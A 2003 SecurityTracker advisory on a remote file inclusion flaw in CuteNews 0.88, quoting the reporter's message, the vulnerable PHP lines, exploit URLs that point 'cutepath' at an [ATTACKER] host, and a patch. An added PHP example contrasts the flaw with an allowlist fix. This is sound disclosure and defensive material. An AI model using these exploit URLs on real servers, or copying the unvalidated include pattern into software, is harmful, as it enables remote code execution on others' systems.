SecurityTracker.com
SecurityTracker Archives
Category:  Application (Forum/Board/Portal)  >  CuteNews
Vendors:  CutePHP Team
CuteNews Include File Flaw Lets Remote Users Execute Arbitrary Commands on the Server
SecurityTracker Alert ID:  1006173
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Feb 26 2003
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.88
Description:  An include file vulnerability was reported in CuteNews. A remote user can execute arbitrary PHP code and operating system commands on the target server.

It is reported that several scripts include files without validating the location of the included file. A remote user can supply a URL whose 'cutepath' parameter points to a remote location for the 'config.php' and 'news.txt' include files, causing the remotely hosted file to be fetched and executed by the target server.

The 'shownews.php', 'search.php', and 'comments.php' scripts are reportedly vulnerable.

Some demonstration exploit URLs are provided:

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/

The remote user can insert arbitrary PHP code into the following files so that, when the above listed URLs are invoked, the arbitrary PHP code will be executed:

http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt

The PHP code can include operating system commands and will be executed with the privileges of the target web server.

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target server.
Solution:  No solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message.
Vendor URL:  air.langame.net/cutenews/index.php
Cause:  Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Over_G" <overg@mail.ru>
Message History:   None.
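The following is an added illustration, not code from this advisory or from CuteNews. It places the reported construction (request-controlled '$cutepath' concatenated straight into 'require_once') beside a hardened replacement, and generalises the reporter's one-line fix (hard-coding '$cutepath="."') to an allowlist of permitted directories with a canonical-path check. It assumes PHP 7 or later, that the script lives in the CuteNews install directory, and that the only legitimate 'cutepath' values are the constructed allowlist entries below.

```php
<?php
// Added example, not CuteNews code. Shows the vulnerable construction from the
// advisory next to a hardened replacement. Assumes PHP 7+ and that the only
// legitimate values of "cutepath" are fixed subdirectories of the install dir.

// --- Vulnerable pattern (equivalent of the reported 0.88 code) ---
// In 2003, register_globals let ?cutepath=... populate $cutepath directly;
// reading it from $_GET reproduces the same flaw on a modern interpreter.
function vulnerable_include_path(array $get): string
{
    $cutepath = $get['cutepath'] ?? '.';
    return "$cutepath/config.php";   // "http://[ATTACKER]/" is accepted verbatim
}

// --- Hardened replacement ---
const CUTENEWS_BASE = __DIR__;                         // install directory
const CUTENEWS_DIRS = ['.' => '.', 'data' => 'data'];  // constructed allowlist

function safe_include_path(string $requested): string
{
    // The request value is only ever a key into the allowlist; URLs, "../"
    // and absolute paths are not keys, so they fall back to the default.
    $dir = CUTENEWS_DIRS[$requested] ?? '.';

    // Resolve to a canonical path and confirm it is still inside the install
    // directory (defence in depth against a symlinked allowlisted directory).
    $resolved = realpath(CUTENEWS_BASE . DIRECTORY_SEPARATOR . $dir);
    $inside   = $resolved === CUTENEWS_BASE
             || ($resolved !== false
                 && strpos($resolved, CUTENEWS_BASE . DIRECTORY_SEPARATOR) === 0);
    if (!$inside) {
        $resolved = CUTENEWS_BASE;
    }
    return $resolved . DIRECTORY_SEPARATOR . 'config.php';
}

// Demonstration with constructed inputs: each line shows where a given
// ?cutepath= value would have sent the include before and after the fix.
$samples = ['.', 'data', 'http://attacker.invalid/', '../../etc', '/etc'];
foreach ($samples as $value) {
    printf("%-26s vulnerable: %-38s hardened: %s\n",
        $value,
        vulnerable_include_path(['cutepath' => $value]),
        safe_include_path($value));
}

// In the real script the hardened path is what reaches require_once:
//   require_once safe_include_path((string)($_GET['cutepath'] ?? '.'));
```

Run with the PHP CLI to see every non-allowlisted value collapse to the install directory. The request value never reaches the file system as a path fragment; it is only used to select among paths the application already trusts. As a second layer on current PHP versions, 'allow_url_include' (and, where the application does not need it, 'allow_url_fopen') should be disabled in php.ini so that a remote URL cannot be executed even if an include path is mishandled elsewhere.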


 Source Message Contents

Date:  Tue, 25 Feb 2003 14:31:55 +0300
From:  "Over_G" <overg@mail.ru>
Subject:  PHP code injection in CuteNews

 

PHP source code injection in CuteNews



Information:
===============================================
Script : CuteNews v0.88
Official site : http://air.langame.net/
===============================================

PHP Scripts :
===============================================

shownews.php :

if(!$cutepath) $cutepath=".";           // $cutepath is request-controlled (register_globals)
require_once("$cutepath/config.php");   // a remote URL here is fetched and executed
{.........}
$all_news=file("$cutepath/news.txt");   // same unvalidated path reused for news.txt

===============================================

search.php :

require_once("$cutepath/config.php");

===============================================

comments.php :

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");

===============================================


Exploits :

http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/
http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/

with :
http://[ATTACKER]/config.php
http://[ATTACKER]/news.txt

Content of config.php or news.txt:
Any PHP code.

===============================================

Patch:
Replace

if(!$cutepath){$cutepath=".";}
require_once("$cutepath/config.php");

with $cutepath=".";

===============================================



Best Regards, Over_G [DWC Gr0up] and VenoM
Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org
Mail: OverG@mail.ru VenoM88@mail.ru

Copyright 2002, SecurityGlobal.net LLC